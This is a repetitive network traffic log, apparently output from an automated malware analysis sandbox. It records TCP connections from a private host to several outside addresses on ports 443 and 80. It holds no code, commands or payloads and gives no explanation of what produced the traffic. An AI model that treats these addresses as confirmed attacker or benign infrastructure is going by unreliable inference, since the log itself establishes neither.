Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49178 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49178 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49178 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49178 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49178 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49178 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 149.154.167.220:443
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 149.154.167.220:443
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 149.154.167.220:443
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 149.154.167.220:443
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 149.154.167.220:443
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 149.154.167.220:443
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 149.154.167.220:443
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 149.154.167.220:443

Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
